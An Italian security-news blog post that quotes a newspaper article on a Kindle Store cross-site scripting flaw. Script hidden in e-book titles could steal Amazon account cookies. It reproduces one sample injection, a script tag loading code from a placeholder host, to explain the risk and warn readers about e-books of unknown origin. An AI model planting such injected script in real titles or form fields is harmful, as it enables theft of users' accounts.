Kindle sotto attacco

attacco-a-kindle
17Set

Kindle sotto attacco

Di 0 Commenti

Anche l’ innocente e culturale E.book.reader è sotto la lente d’ingrandimento degli Hacker, proprio stamattina mi è capitato di leggere un articolo su “il Fatto quotidiano” a firma del sempre ottimo Rapetto che riporto in parte e parlava proprio di questo problema tornato in auge in questi giorni:

Estratto Articolo de Il Fatto Quotidiano —

Proprio in questi giorni è riapparsa una minaccia che – scoperta nell’ottobre di un anno fa – molti credevano esser stata curata a dicembre e definitivamente archiviata. Il 16 settembre sarebbe stato individuato un nuovo specifico rimedio.

A lanciare l’allarme è un ricercatore particolarmente attivo, Benjamin Daniel Mussler, che non esita a spiegare che gli hacker possono ‘avvelenare’ i lettori Kindle utilizzando codici maligni o ‘script‘, nascosti ad esempio nel titolo di un e-book, andando a compromettere gravemente l’account Amazon del malcapitato di turno.

L’azione criminale va a colpire le funzioni di gestione dei contenuti e dei dispositivi e quelle di impostazione dell’apparato presenti nella libreria di Kindle. Una tanto impercettibile quanto venefica istruzione maligna come « <script src=”https://www.example.org/script.js”></script> » può essere mandata in esecuzione non appena l’utente apre la pagina web del Kindle Store: i cookies dell’account di Amazon possono essere raggiunti e trasferiti a chi ha progettato la trappola con conseguenze sgradevoli per chi si è inconsapevolmente fatto scippare la propria identità di bibliofilo digitale.

Mentre gli e-book “originali” sono considerati sicuri, quelli acquisiti da fonti non certificate (siti “birichini” o amici/colleghi pronti a condividere file di dubbia o ignota provenienza) possono essere sfruttati dai moderni manigoldi per andare a segno.

Mentre gli esperti sono al lavoro per verificare se il “fixing” (ovvero la riparazione della falla) è andato a buon fine, la raccomandazione è quella di non cadere nella tentazione di accaparrarsi libri elettronici di cui non si conosce l’origine o che si sa essere frutto di più o meno acrobatiche scorribande.

Twitter: @Umberto_Rapetto

Quindi signori miei, se siete felici possessori di uno di questi fantastici gingilli. trattateli con cura.

 

Fonti: il Fatto quotidiano – Umberto Rapetto

Condividi questo post

Autore

Internet & IT Worker | Privacy Expert | DPO | Marito & Padre | Arciere per passione.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

Related Posts

Data Breach Unicredit
27Lug

UNICREDIT data breach: dai media ed “esperti” le solite “puttanate”.

La Sicurezza informatica è una roba seria, non credete al primo cyber esperto che incontrate! Questa storia, come nel caso... leggi di più

PowerOffHijack cosa fare
24Feb

Spegniamo PowerOffHijack, niente panico.

Un uovo malware, scovato dai tecnici di AVG, sembra insidiare gli apparati che utilizzano Android, si tratta di  PowerOffHijack o... leggi di più

16Ott

Dopo ICloud violato anche DropBox: 7 milioni di account violati

Questa volta ad essere colpito è il popolare servizio cloud Dropbox. Sette milioni di account sarebbero stati violati e... leggi di più

15Set

Mail Agenzia delle Entrate: attenti al phishing

Una mail che arriva dall'Agenzia delle Entrate. L’oggetto che recita “Linee guida” e l’invito a scaricare il file in... leggi di più

10Ott

Quarantacinquemila tentativi di Phishing in pochi mesi verso clienti Poste.

I clienti delle Poste Italiane negli ultimi mesi sono stati presi di mira dai truffatori online attraverso alcune campagne... leggi di più

Digital Economy & Society Index 2016
26Feb

DESI 2016: la classifica del Digitale Europea dice che …

Ieri, 25 Febbraio,  è stato reso pubblico dalla Commissione Europea il DESI 2016 "The Digital Economy & Society Index" che... leggi di più

16Set

Italia terza al mondo per visite a siti maligni

Trend Micro ha presentato il report delle minacce informatiche che hanno colpito il secondo trimestre 2014: - In Italia sono... leggi di più

11Set

Rubati account di GMail

La notizia è di quelle da fa rizzare i capelli: un forum russo specializzato in sicurezza informatica ha pubblicato le... leggi di più

difesa senza https
05Set

Il Ministero della Difesa, senza difesa

Il sito dell'aeronautica, nella sua versione https ,cioè con protocollo protetto, va in errore Ebbene sì, la farò breve, se... leggi di più

jailbreak 8 instabile
31Ott

Jailbreak iOS 8 instabile, Attendete

Jailbreak iOS 8 è uscito da circa una settimana con grande anticipo rispetto alle attese grazie al team Pangu... leggi di più